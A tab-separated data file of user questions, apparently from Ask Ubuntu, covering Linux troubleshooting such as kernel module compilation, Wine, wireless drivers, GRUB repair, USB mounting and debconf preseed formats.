489640	compiling a ( specific ) kernel module	i 'm looking to compile a .c file which is said to be a kernel module . i tried to create a makefile but still got errors . specifically i am trying to compile https : //github.com/janmanx/hid-apple this will help other people who want to swap their fn and control/ctrl keys on their macbook . i tried running the pre-compiled .ko file with no luck . besides , knowing how to compile the module will be good to know . edit/solved : i took the nuclear option to solve this . following the instructions here https : //wiki.ubuntu.com/kernel/buildyourownkernel i downloaded all the sources , replaced the hid-apple.c file from the source with the one linked at the begining , and then built my kernel . it works !
489641	problem installing winbugs with wine	on 64-bit ubuntu 14.04 ( linux kernel 3.13.0.30.36 ) i 'm trying to install the winbugs markov chain monte carlo software with wine 1.6 , but after wine winbugs14.exe i get the following error message : modify_ldt : invalid argument modify_ldt : invalid argument modify_ldt : invalid argument modify_ldt : invalid argument modify_ldt : invalid argument err : module : attach_process_dlls `` krnl386.exe16 '' failed to initialize , aborting err : module : ldrinitializethunk main exe initialization for l '' c : \\windows\\system32\\winevdm.exe '' failed , status c0000005 there seems to be some discussion of the problem here—something to do with incompatability between certain kernel versions & certain wine versions for 16-bit applications . what options do i have ? if there 's a way to install an older version of wine on ubuntu 14.04 it would suit me fine , as i remember winbugs running with wine 1.4 , & i do n't use wine for running anything else . ( i already use the alternative mcmc software , jags , but i 'll be needing winbugs for a course . )
489642	no smooth scrolling on chrome for ubuntu	i did enable the # enable-smooth-scrolling flag in chrome and rebooted both chrome and the machine numerous times , but scrolling in chrome is still just as jumpy . i know it 's not hardware issue , as my machine can handle smooth scrolling of huge .pdf documents just fine , but chrome stutters even on simplest webpage . is there an additional flag i should enable or perhaps a some touchpad configuration i should make to see chrome on ubuntu scrolling just as smooth as on windows ?
489646	mono ca n't find mysqlconnectionstringbuilder ?	this application works and compiles fine on a windows pc but not with monodeveloper . i have added `` using mysql.data.mysqlclient ; '' and mysql.data.dll is added as a reference . i can use other parts of mysql.data but not mysqlconnectionstringbuilder . the type or namespace name `mysqlconnectionstringbuilder ' could not be found . are you missing an assembly reference ? now , i 've tried and google me out of this but as i read mysqlconnectionstringbuilder should be a part of mysql.data.mysqlclient - and i am using it .
489647	how to leave prompt when accidentally enter grave accent character ?	if i write grave accent character in the terminal , my prompt becomes bquote : and i can not leave it in anyway . how can i leave this prompt ?
489648	network being disabled after shutting computer	i have ubuntu 14.04 and i 'm running on a dell studio with a disable wireless switch . `` why do we even have that switch ? '' i wonder , but that 's besides the point . anyways , sometimes i just close my computer without shutting it down . when i do , and then i open it the next day , it seems there 's a 50-50 chance that the network ends up like the upper right of the image included . even though i click `` enable networking '' , nothing happens . i can fix this using sudo service network-manager restart , but i 'd like to know why this is happening in the first place .
489651	can i install ubuntu 14.04 on a 8 gb ssd harddrive ?	i d like to buy a lenovo ideapad z510 laptop which has got a 508gb ssh harddrive ( it s 500 gb sata and 8 gb ssd ) . the preinstalled os is dos , i want to replace it with ubuntu is the 8 gb ssd harddrive large enough to install ubuntu 14.04 on it ? what is going to happen if the ssd harddrive is too small ? will ubuntu still be installed properly ?
489653	permissions denied even though i 'm a system admin ( and the only user of the system , ) when trying to access and edit .desktop files ? ( 14.04 )	when i try to save the .desktop file ( for google chrome in this instance , ) i revive a message that in short states i do not have the require permissions to do this . is there any fix for the problem at all ?
489654	firmware install on hp 630	i have a realtek8188ce network device . the output of sudo lshw -c network is : *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 06 serial : 00:9c:02:90:79:33 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168e-2.fw ip=192.168.0.108 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport:3000 ( size=256 ) memory : d0404000-d0404fff memory : d0400000-d0403fff *-network disabled description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 44:6d:57:06:5a : bf width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.13.0-29-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:18 ioport:2000 ( size=256 ) memory : d4400000-d4403fff and rfkill list all is : 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : hp-wifi : wireless lan soft blocked : yes hard blocked : yes is there a generic fwcutter to do this or is it more involved ? i 'm no newbie but not an expert by any means .
489656	game in wine causes second monitor to become over exposed	i have 2 monitors and when i run a game through wine , it causes the second monitor to become over exposed and increases the sharpness quite a bit . i have played around with settings in both the game and the ubuntu settings , but nothing seems to be working . the only way to fix the exposure is to restart my entire computer . the primary monitor seems to be fine . is there a way to fix this or to at least revert it once i 'm finished with the game ? i 'm not really sure what 's going on here . currently , i need to restart in order to fix the problem . which is kind of a pain . ubuntu 14.04 radeon hd 6750 w/ proprietary drivers game : star wars galaxies the white from the exposure makes the monitor hard to use .
489657	nexus 10 and ubuntu touch	i 'm following these instructions on a nexus 10 with cyanogenmod already installed . at the step ubuntu-device-flash -- channel=devel -- bootstrap i get 4 things pushed ok /home/bob/.cache/ubuntuimages/gpg/image-signing.tar.xz /home/bob/.cache/ubuntuimages/gpg/image-master.tar.xz /home/bob/.cache/ubuntuimages/ubuntu-touch/devel/manta/version-87.tar.xz /home/bob/.cache/ubuntuimages/pool/device-068493e300c316873d9b41dad6c49132594f8393c06846c877ce7f845e7f7f0b.tar.xz but can not push /home/bob/.cache/ubuntuimages/pool/ubuntu-0b7e7a64fd4692efef0165183e6d9f595f5a527207971478e84874d45a399be8.tar.xz.asc to device : free space on /cache/recovery is unknown where do i go from here ? any help much appreciated .
489658	cisco am10 wireless adapter not working on xubuntu 14.04	i recently installed xubuntu 14.04 . during the installation it detected my wifi adapter and connected fine . however , once i started using the system , the wireless adapter is no longer available . if i look under the network connections , it shows the wifi network last used 1 day ago . however if i run the command sudo lshw -c network i get the following : *-network description : ethernet interface product : 88e8056 pci-e gigabit ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 12 serial : 48:5b:39:43:06 : cd size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 duplex=full ip=192.168.1.14 latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:74 memory : fbdfc000-fbdfffff ioport : d800 ( size=256 ) memory : fbdc0000-fbddffff any ideas ?
489662	how can i calibrate audio settings for my bose usb audio speakers ?	i recently updated from 12.04 to 14.04 , and since , i have been having problems with my bose companion 5 speakers ( 5.1 surround analog audio output ) . as you might know , alsa and pulse audio have all been linked together , which is all fine and dandy , but whenever i adjust the volume below about 90 % , i ca n't hear anything through the speakers . i opened up alsamixer and navigated to bose usb audio soundcard , saw that it was at zero and thought `` ah ha ! here 's the problem . '' but as soon as i started raising the volume , my master output volume jumped to 90 % i would just deal with it , but when the entire viable output range is that condensed , i ca n't even effectively control the volume of the speakers with my hardware volume controls . is there anyway i could map the bose output range to 0 and 100 % master volume ? or better yet , reconfigure sound settings to how they were in ubuntu 12.04 ? i really rather not have to use the terminal alsamixer every time i want to change the volume on my speakers .
489663	laptop overheating dell studio 1537	hi i installed both mint 17 and ubuntu 14 in a dell studio 1537 . the laptop overheats and shuts down on both linux distros but it 's fine with windows vista . i tried to find a way to fix it on the forums but the responses are always too complicated for me and for some reason , none have work . i may be doing something wrong . i am quite illiterate with computing and new linux user . i really like ubuntu and i would like to stick with it , but i can have the laptop running so hot al the time and shutting off without warning ... i would appreciate any help that you guys can give me .
489664	`` package dependencies can not be resolved '' when installing codecs	i 'm trying to install some additional codecs , but it always throws the following error : the following packages have unmet dependencies : gstreamer1.0-libav : i386 : depends : libavcodec-extra-54 ( > = 6:9.13 ) but 6:9.13-0ubuntu0.14.04.1 is to be installed depends : libavformat54 ( > = 6:9.1-1 ) but 6:9.13-0ubuntu0.14.04.1 is to be installed depends : libavutil52 ( > = 6:9.1-1 ) but 6:9.13-0ubuntu0.14.04.1 is to be installed depends : libc6 ( > = 2.7 ) but 2.19-0ubuntu6 is to be installed depends : libglib2.0-0 ( > = 2.37.3 ) but 2.40.0-2 is to be installed i recently installed the ppa : mc3man/trusty-media ppa . the output of apt-cache policy libavcodec-extra-54 : libavcodec-extra-54 : installed : ( none ) candidate : 6:9.13-0ubuntu0.14.04.1 version table : 6:9.13-0ubuntu0.14.04.1 0 500 http : //us.archive.ubuntu.com/ubuntu/ trusty-updates/universe amd64 packages 500 http : //us.archive.ubuntu.com/ubuntu/ trusty-security/universe amd64 packages 6:9.11-2ubuntu2 0 500 http : //us.archive.ubuntu.com/ubuntu/ trusty/universe amd64 packages what can i do about it ?
489666	modifying hpijs-pc.ppd for brother printer	i have a brother hl-2270dw printer and i am not entirely happy with it . attempting to edit the ppd for the linux driver i found i could not . posting the problem to the cups mailing list , i discovered the ppd 's for most brother printers can not be readily modified for the linux driver is in the form of a wrapper which writes specific pcl . further research on google led me to discover the foomatic driver for the hl-2170w . i have removed all of the files installed for the brother driver and am using the stated foomatic driver . i want to attempt modifying it for some custom page sizes . my questions are : how do i back-up the existing ppd ? from the printer test page in ubuntu , it states the driver is hpijs-pc.ppd . yet , searching my system for that file yields nothing . i found on the 'net a definition of a hpijs-pc.ppd so i have that as a basis from which to modify the driver . can the foomatic driver be easily modified like a regular ppd and will the changes take hold ? thanks for taking the time to read this .
489671	which ati drivers to use , and how to keep them updated ?	i 'm new to linux and recently installed xubuntu 14.04 . it 's currently using the : using x.org x server -- amd/ati display driver wrapper from xserver-xorg-video-ati ( open source ) which it also says is recommended . my other two options are : using video driver for the amd graphics accelerators from fglrx ( proprietary ) using video driver for the amd graphics accelerators from fglrx-updates ( proprietary ) i 'd like to get the most performance i can out of the card , so which driver would be best to use . i know there is an option to download directly from amd which i have not yet tried . is the one i would download from amd the same as one of the options above ? also , which one would be the easiest to keep updated ? thanks in advance .
489673	how do i install things ? or , what 's xcb and qt and how do they solve the riddles of my life ?	tl ; dr is at the bottom for those not wanting reasons , just questions . i have the latest teamspeak client downloaded from the site of the authors of said program . i 've managed , after a load of fiddling then some searching , that a .run file is stupidly packaged and needs modifying to be an executable instead , so i did that and ran the bleeding thing . it gave me a folder full of useless twiddle and files that were named as if they were thought up by a hyper-active , star trek addicted seven year old doped up on a recent 10 season marathon and various amphetamines . i got a bit frustrated at the lack of working files and then went online where i noticed people were just telling others to run a file called `` ts3client_linux_x86 '' . that 's swell , and all , but that file just flashes a terminal on my screen for less than a second . so i set about trying to capture it on a print-screen to as to actually read what it 's saying . after about 5 or 6 minutes of trying , i finally managed to immortalise bigfoot 's purple and white box of a brother , only to find out that kid 's back at it again , and this time he 's got his phasers set to acronym . in the picture is the message : '' this application failed to start because it could not find or load the qt platform plugin `` xcb '' . available platform plugins are : xcb . reinstalling the application may fix this problem . '' now , i 've never installed a qt or a xcb and never intended to , as i 've never heard of them before , so i assumed it was telling me to reinstall the ts client .run thing again . i got the same message every single time i did it , so now i was lead to believe it wants one of these plugin things . `` off to google ! '' i shouted , it blissful , blissful ignorance . my adventure was far from blissful . i 've stumbled into the cave of monsters that seem really really fond on talking a language only they know - they also seem to enjoy building doors into their cave in some vehement attempt to be as open as possible while becoming more confusing than discerning why suarez has the munchies . they all spoke gibberish . every single thread i found . nothing helped and no one seemed to be getting the idea that what they were on about is useless to the people asking them questions . when a kid asks you what life means , you tell them something simple like `` having fun '' or `` making your mark on the world '' ; you do n't tell them it 's an existential crisis that mankind has faced for eons as the answer is entirely subjective , then leave them wondering what `` exissensul cry sis '' means - the rest of your drivel long forgotten . tl ; dr , what body part of this os do i need to suck to get something working ? what 's xcb and qt and where do i get some ? can anyone speak in a language that 's universal , or will i need to look up google translate linux > english ? i 'm on 12.04 . it 's dual boot , my main being win7 . i want ts3 not ts2 ( ts2 's on the software centre ) .
489676	can not access computer drives	i am new to ubuntu . i just installed version 14.04 when i click on files , under devices , it shows computer & nothing else . even in the computer folder , there are multiple folders but nothing showing a drive ( like how in windows , it used to show as c , d or e ) i connected my external hard disk & that reads just fine but if i copy something , i can not paste it anywhere . i have downloaded gparted partition editor - and it shows /dev/sda1 ( with a little key next to it ) . under `` file system '' it shows as `` ext4 '' and under `` mount point '' there is a `` / '' . the size is shown as 463 gb which is the size of the hard disk in built . so now of course , i want access to this . i have read alot of faq 's on the forum but somehow they all seem to be bouncing over my head & i have not been able to come with a solution . please help & preferably - in an easy step by step way . thanks .
489679	unable to install tor	can anyone guide me how to install tor in ubuntu 14.04 lts . i am new here and even dont have expertise in linux , but very much willing and excited to learn linux . i need to install tor anyhow on my laptop ( ubuntu ) . please any help and support from anyone shall be highly appreciated .
489681	how to install ubuntu on usb stick and preserve the changes ?	there are many answers about this that did not work for my situation . i have the following : ubuntu 14.04 usb 2.0 and usb 3.0 ports usb 2.0 stick with ubuntu 14.04 usb 3.0 empty stick and want to install the 14.04 on the usb 3.0 empty stick . then , i want to install the new amd catalystâ˘ 14.6 beta drivers on it and sgminer . finally , ssh for remote access and drivers ethernet driver as well . that 's all what i need . so , is it possible to install the drivers and programs that i need and when i use the usb stick in other machine to expect they will work ? also , i have try to install the ubuntu 14.04 on the usb 3.0 stick - it takes a lot of time and finally it says `` error loading operating system '' .
489682	use alt as ctrl and win as alt ( keep alt )	i am using xfce4 and i am trying to do the following : i wan na keep the left ctrl as is while also making the left alt act as a ctrl and the win button act as an alt ( i do n't need the win button ) i 've tried to do these in terminal : setxkbmap -option altwin : ctrl_alt_win then this : setxkbmap -option ctrl : aa_ctrl but now the left ctrl actually does two things at once : ctrl and win action ( if i press it in emacs i get c-s- ) how do i simply just do that mapping ?
489686	purple screen after reinstalling grub multiple times	i recently dual booted my laptop with windows 7 x64 and ubuntu 14.04 . i followed all the steps and now it seems windows 7 only works when it wants to work . when it doesnt want to work it hangs on a purple screen . i have tried everything ! i have tried boot-repair and edited the grub2 conf file , and it still happens ! ! can someone please help ? update : i finally got into windows 7 so this appears to be intermittent . i would still like to get this resolved if anyone cares to help . update : can someone please help ? ! ? !
489688	auto entering root password	in fedora 20 , there 's an option when enabled , the system enters the root password whenenver a window is opened asking for root password . is there a way to add such functionality to ubuntu ?
489689	no headphone signal after installing ubuntu 14.04	regarding ubuntu 14.04 using laptop and internal speakers are working properly . sound card is detected . when plugging in powered desktop computer speakers to headphone output there is no sound . nothing is muted , all volume is up . sound settings automatically set to `` play sound through headphones '' when i plug speakers into headphone output . i have purged/reinstalled pulse audio i have purged/reinstalled alsa . still , only internal speakers working properly . when i boot up windows instead of ubuntu , everything works fine again . how can i track down this problem ?
489690	optimus technology : can i use intel graphic with hdmi external display	i have a lenovo t430 with the optimus technology . i am using nvidia-prime to be able to switch between nvidia and intel cards . so , far there is no problem until i got an external monitor and i wanted to use it with my laptop . i know that with the display topology of my laptop , the mini displayport is connected to the nvidia card . thus , with nvidia-prime , i can use the monitor perfectly but my laptop get hot quickly . i want to use the intel card while using the external monitor but the mini displayport is not connected with the intel card . also , i know that when i use nvidia card , the graphic is processed by that card first and then the data are sent to the intel card before being displayed to the monitor of the laptop . i would like to know if there is a way , to use the intel card in the same way : the graphics are processed with the intel card first and then they are sent to the mini displayport through the nvidia card .
489694	platform ubuntu 14.04lts	i am trying to install driver from cd for asus wireless-n150 usb adapter that i got from adapter on ubuntu 14.04 - 64 bit , it is not recognized with by pluging in i have almost no experience in building things drivers form source i copied the cd folder linux to desktop due to limit of 30000 characters contents of linux folder are in https : //www.dropbox.com/s/299pq94jw13akv5/tree.txt complete manual can be seen https : //www.dropbox.com/s/ebsrbeaoo5qbpef/quick_start_guide_for_driver_compilation_and_installation.pdf quick start guide for driver compilation and installation says : introduction in this document , we introduce two ways to compile and install our wi-fi driver : 1 ) using install.sh script for pc-linux and 2 ) step by step manually . the former targets for end users who are not familiar with linux system , while the later for engineers who want to port our wi-fi driver onto different platforms . 1 . using install.sh script for pc-linux for driver compilation and installation in pc-linux , we provide an install.sh script to do the duties automatically . if you want to use our wi-fi solutions to access network on pc-linux , use install.sh scrip in terminal mode for pc-linux and then control wi-fi with utilities such as network manager . for further information about wi-fi station mode , please refer to : document/quick_start_guide_for_station_mode.pdf . if you want to apply our wi-fi solutions on other embedded platforms , you should read and check the following paragraphs . as root i ran install.sh desktop/linux/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405 # bash install.sh and i got an error output is in file https : //www.dropbox.com/s/l8kcag74ouw6dkl/output.txt reading quick start guide for driver compilation and installation onward since automatic install.sh failed i found this in section 3 : 3 . compilation settings in makefile 3.1 . adding or selecting target platform the default target platform is pc-linux , if you do not want to compile driver for other platforms you can skip this section . to add or select target platform for compilation , we provide two sections in makefile : 1 ) platform selection section and 2 ) platform setting section . first , you should look at the platform selection section of makefile : config_platform_i386_pc = y config_platform_android_x86 = n config_platform_arm_s3c2k4 = n config_platform_arm_pxa2xx = n config_platform_arm_s3c6k4 = n config_platform_mips_rmi = n config_platform_rtd2880b = n config_platform_mips_ar9132 = n config_platform_mt53xx = n config_platform_rtk_dmp = n the platform selection section consists of entries with „config_platform_‟ prefix . only one entry is allowed to be set with value „y‟ and others with „n‟ . the „config_platform_i386_pc‟ is selected by default . i think since i have 64-bit os need something ending with x86_64 is the platform wrongly set and that is why it install.sh makes error ? how to determine which is the right one ?
489695	windows ca n't view secondary ubuntu hard drive files	currently i have two hard drives on my laptop one has windows 8.1 on it and the second one has ubuntu 14.04 . the problem is when i boot into ubuntu i can view and modify files on my windows hard drive , but when i 'm booted in windows i ca n't view the files on my ubuntu hard drive . the hard drive shows up in windows disk management but none of the drives/volumes have assigned letters on the ubuntu hard drive , and i ca n't even assign a letter to the hard drive using diskpart command line . is it even possible for windows to access the files on my ubuntu hard drive , which is ntfs formatted by the way , or do i just not have something set up right to do it ?
489701	how to change ubuntu dhcp server address on the client ?	how do i tell ubuntu to use a specific dhcp server ip ? i 'm building a virtual test network in virtualbox where i have a ubuntu server installed . however , virtualbox does n't have an option to tell other computers to use a specific vm ip as the dhcp server .
489702	cant boot windows 8 or ubuntu !	i 've recently bought a laptop with windows 8 and ca n't stand it . though i need to keep it for some software i use at work.. i was advised to install ubuntu and have it set as dual boot . one completely wasted weekend later and i now cant use windows 8 or ubuntu . ubuntu worked fine after the install , ( not done in legacy mode ) but the boot files for windows were gone . after doing boot-repair and recommended , i got an error saying grub could not be installed . now linux will not boot either without the cd . after loads and loads of google searches everybody 's answer is different and conflicting with the last.. this is really frustrating now , i 'm a linux virgin and do n't have any more time to waste on this . can someone with more experience please advise how to install grub whilst booting from the livedisk
489704	why is n't skype available for ubuntu ?	i really need skype but ca n't find it at ubuntu software centre . it would be really helpful if you guys create an ubuntu version for it . i am currently using 13.04 as my primary os but have to switch to windows every time i intend to use skype
489708	/dev/sdb contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should	when i open gparted i get the following warning : /dev/sdb contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? this is on a ssd if it makes any difference ... thanks in advanced .
489713	ubuntu server 32-bit 14.04 hangs	i have been in it for many years but i am also kind of new to linux . i have installed ubuntu on desktops a few times but never a server . i am trying to install 14.04 32 bit on a dell power edge 600sc . i just upgraded the cpu to a pentium 4 2.53 ghz and the memory to 4gb . i burned a fresh iso onto a new cd and started to install . i got to the language choice screen , selected english and then it just hangs with a black screen although the monitor led is lit indicating a video connection . i was wondering if this setup will run it or should i try version 12.04 ?
489717	how can i install ubuntu on dell inspirion 15z	i am trying to install ubuntu 14 on a dell inspirion 15z with intel chip . the machine came preloaded with windows 8 . i want to wipe windows out and run only ubuntu . when i try to install the installer does not detect any discs . i have modified the sata in the bios from ata to ahci and intel smart response technology . secure boot is off . ubuntu crashes on install . procenviron [ errno13 ] permission denied . i have tried legacy mode and uefi and still no discs are detected . i also tried to install fedora and mint and they both stopped at the same place -- no discs detected ? is there anything else i can do ?
489718	doubt : need suggestion to buy laptop in budget for using ubuntu	i 'm from france and i 'm searching for a laptop to run ubuntu on it and to start ( /continue ) to learn programming . i 've got a budget of ~300âź ( let 's say $ 400 but they usually do $ 1=1âź .. i often found laptop twice expensive in euros than in dollars ) i watched for chromebooks but their low ssd capacity does n't please me : / and i 'm even more restricted because a lot of laptops are sold in u.s but not in france : ( thank you for your help ! ( excuse me for my english xd )
489719	stop skype from launching on startup ? ( xubuntu )	skype keeps starting at startup without my permission . i do n't want it to start minimised , there 's already a solution for that , i want it not to start . but there is n't a single setting in skype 's options , and skype is not in my startup applications . edit â as requested , a screenshot of the `` session '' tab in my session & startup settings : and the weird output of that `` grep -lir 'skype ' ~/.cache '' command , giving me something about kingsoft office : /home/wolf/.cache/logrotate/status /home/wolf/.cache/kingsoft/wps/http/cache_c8034f79bfb82e94e16ff8ebebcfff38262f0359.cache /home/wolf/.cache/kingsoft/wps/http/cache_030f47fb47e37a138cb0973e152475a098eeee54.cache
489722	laptop speakers make noise when audio jack is plugged in	i 'm using a lenovo ideapad y410p with ubuntu 14.04 , and when i plug in headphones to my computer , the laptop speakers emit a loud , high pitched hum . i 've fixed the issue and just made this thread to answer it for others .
489723	huawei e1752 modem connects to gsm network but no internet access	my huawei e1752 dongle is recognised by ubuntu 13.10 , i can set up a mobile broadband connection and the os tells me i have a network connection to the gsm network . the blue light on the device that indicates a connection is showing . however i have no internet connection . the device has previously been working on an ubuntu for netbooks machine and is in regular use on a windows 7 machine . the only lead i have so far is lsusb is reporting the device as a different model from huawei . output ( see line 2 ) : me @ my_pc : ~ $ lsusb bus 002 device 003 : id 0930:0214 toshiba corp . bus 002 device 006 : id 12d1:1436 huawei technologies co. , ltd. e173 3g modem ( modem-mode ) bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 10f1:1a2a importek laptop integrated webcam bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub the common advice for these things seems to be switching the device from usb storage mode to modem-mode , but it seems to be in modem-mode without me having to configure anything .
489725	how to mount usb drive as user writable	i want to mount my usb hard drive as myself , or in my group , whatever it takes to be able to move stuff onto the disk without sudo . i have tried setting up a rule in /etc/udev/rules.d/mountasuser.rules ( also tried the filename 99-mountasuser.rules ) . the contents of that file : kernel== '' sdb2 '' subsystem== '' block '' group= '' me '' i 've tried lots of different setups in this file , because my original intention was to make it more general , since i pretty much want any external drive to be writable by me . since those more general versions did n't work , i kept trying to simplify until i had the rule above . this drive wo n't be connected all the time so fstab is not a good choice . the version of ubuntu i have ( 14.04 ) does n't have the udevinfo command , and running sudo udevadm info âquery=all -n /dev/sdb2 âattribute-walk does n't output things in the same format , so maybe i 'm not selecting my drive correctly in the udev rules , but my rule is so simple , that does n't make sense . the output of udevadm info : http : //paste.ubuntu.com/7723273/
489729	can i recover data from lost partitions ?	i had windows 7 and windows 8 dual booted . i tried to install ubuntu 14.04 by deleting windows 8 , but unfortunately whole hard disk wiped . now i have only ubuntu 14.04 installed using whole hard disk size . i 'm at a loss now after losing my project data . i had 3 ntfs partitions other than the win 7 and win 8 partitions . can i recover my data ? if possible how ? thanks
489732	vlc 's screen just disappeared	i just made a fresh installation of ubuntu 14.04 lts , and after installing vlc , it does n't work well . it plays audio only and the vlc main screen is n't there . i tried uninstalling and reinstalling and it 's just the same thing . any help ?
489735	how to install flash player plugin in lubuntu ?	i am actually using lubuntu , and i ca n't install the abobe flash player plugin with chromium . when i download it on the adobe flash player website , lubuntu ask me ( in french , sorry , i live in france ) : `` chromium doit lancer une application externe pour gérer les liens de type apt : . le lien demandé est apt : adobe-flashplugin ? channel= $ distro-parter . l'application suivante va être lancée si vous acceptée cetet requête : xdg-open si vous n'êtes pas à l'origine de cette requête , il s'agit probablement d'une attaque contre votre système . si vous n'avez pas lancé cette requête de manière intentionnelle , cliquez sur ne rien faire . '' then i click on `` lancer l'application '' ( `` open the application '' ) and chromium only open a new page without nothing written ( except `` google '' ) . the problem is i ca n't watch videos on internet without that plugin . thank you for your help .
489738	make ubuntu not use specific physical address range	i ran memtest86 and it found some errors . until i replace the faulty memory , i would like to be able to tell my os to not use the problematic address range . is it possible to tell linux to ignore the existence of a part of the physical address space ?
489739	ubuntu 10.04 wired connection and wireless wont work	i am pretty much new to ubuntu , and after installing ubuntu 10.04 lucid lynx , the wireless did n't work . i tried connecting it to a enthernet cable , but it did n't do anything . my laptop is a toshiba satellite a55-a5300 , if that helps . thanks .
489740	can i download my files the conventional way ?	i 'm trying to access a single file that i stored in ubuntu one over a year ago , now i 'm trying to download that single file but due to the recent `` expiration '' of the service it seems like i have to download everything by commencing with the most recent files . is there a ways to access my files as we were able to do and download that single file ? honestly , i 'm not even interested on the rest of them .
489741	tp-link tl-wn751nd not detecting networks ( most of the time )	i have the tp-link tl-wn751nd . i only bought it and fitted it in the last week . however , it has been causing a lot of issues . before i bought this pci card , i researched online to see if it was compatible with ubuntu . i saw a lot of reports of it causing older versions ( with older kernels ) to freeze after a few minutes of operation , but i also saw a lot of those reports which also said this problem was fixed in a version of ubuntu much older than 14.04 ( around 12.04 if i recall ) . i also saw reports that this card works perfectly in 12.10 . so i thought it would be fine , considering the amount of people reporting it works perfectly . at first , i thought it had worked , it connected straight away with no problems , but after a while it began to disconnect itself after a few minutes of usage , and once it had disconnected itself you could not re-connect because the amount of networks available in the menu had drastically dropped from around 5 or 6 , to just 2 . unfortunately , my router was not one of those 2 . and from then on , the majority of the time it was only those 2 that would show up . and sometimes it was just 1 . sometimes , though , my router would show up , and it would connect just fine . however , after a few minutes of usage we end up back to square one . i 've looked around a lot , tried various solutions to do with the this card and similar and none of them seem to have worked . before i go and buy a different card , i want to see if a bespoke question might get some answers . this is actually the second card i have tried now too . here are some generic points of interest related to the problem : the operating system is ubuntu 14.04 64 bit . the card is a tp-link tl-wn751nd . the chipset is a ar9227 . the card is near-on brand new , and is the second card i have tried with ubuntu . also , on a side note , does anybody know of any pci ( not pci-e , or usb ) wifi cards that are known to work without a hitch on ubuntu ? regards
489742	vm is not booted . grub rescue	i am using virtualbox 4.3.8 to run ubuntu 11.10 as a guest on windows 7 host . i shut down the vm and then restarted the host machine . due to some unavoidable reason , i had to force shut down the host before restarting . after turning on the host machine , when i tried to boot the vm , i got the following error message : error : file not found grub rescue > i have several very important files in the vm . if it is not possible to recover the vm , at least , i need to get back the files stored in the vm . i have used boot repair , but it could n't fix the errors .
489746	looking for info on debconf-set-selections/pre-configuration/pre-seeding specs format	the output of debconf-get-selection , once the comment and blank lines are filtered out , consists of records ( i.e . rows ) of 4 ( or sometimes 3 ) whitespace-separated fields . for example1 : d-i apt-setup/services-select multiselect security , updates d-i apt-setup/security_host string security.debian.org tasksel tasksel/first multiselect standard , web-server tasksel tasksel/desktop multiselect kde , xfce popularity-contest popularity-contest/participate boolean false d-i finish-install/reboot_in_progress note this 4-field format is also the one prescribed a for `` pre-configuration '' ( aka `` preseed '' ) file . ( such a file may be passed to the debian installer to automate some or all of a debian installation . ) hence one could say that a file in this 4-field format has two slightly different possible interpretations : it can either be a report of an existing debian-based system , or it can be a set of directives for the debian installer . afaict , values for the first three fields in this format are `` controlled '' ( i.e . they come from some prescribed , controlled vocabulary ) , whereas values for the last field are , in general , `` uncontrolled '' ( aka `` free text '' ) . for example , these are all the field-3 entries i 've come across so far : boolean select string error note multiselect password terminal entropy in contrast , there 's a lot more variety and heterogeneity among the field-4 entries ; they alone can include whitespace , or be omitted entirely ( in which case the preceding delimiter may also be omitted , afaict ; btw , the last record in the excerpt above illustrates the case where the fourth field is missing ) . field-4 entries i 've seen include some number configure network manually r00tme wlan : 0 atheros communications inc. ar9462 wireless network adapter ( wireless ) most none 50some_device__________regular local delivery only ; not on a network zurich finish the installation ... etc . i 'm looking for more details than i 've been able to get from the man pages for debconf-set-selections and debconf-get-selections on the format/schema above . in particular , i 'm looking for answers to the following questions : what are the possible values for each of the controlled fields ( fields 1 , 2 , and 3 ) , and what do these values mean , precisely ? what does it mean when the fourth field is empty ? and more specifically , what is debconf-get-selections reporting about an installed system with a record whose fourth field is empty ? how does the debian installer interpret a record whose fourth field is empty ? 1note that , for the sake of readability , i 've used whitespace in this excerpt in a way that does not adhere to the specifications for the debconf-get-selections/debconf-set-selections format ; the latter state that a single space or tab should be used to separate the fields .
489752	boot clonezilla iso from grub2 menu	i want to use the most current clonezilla iso file to backup the partition that contains the ubuntu operating system that is stored on partition one of my computer 's hard drive and i want to be able to boot the iso file from the grub2 menu . how would i set this up ?
489755	3.13.0-30 kernel issue will not log in / sign in	i did a recent update with the new kernel 3.13.0-30 seemed fine to start with booted to the desktop but after sign in just hung with only mouse inputs seeming to work and nothing else no menu our header bar . i can boot ok with 3.13.0-29 and use the laptop but other than i 'm pretty stuffed with the recent kernel any ideas ? specs : laptop : satellite c660d processor : amd e-450 apu with radeon ( tm ) hd graphics ă 2 graphics : vesa : wrestler
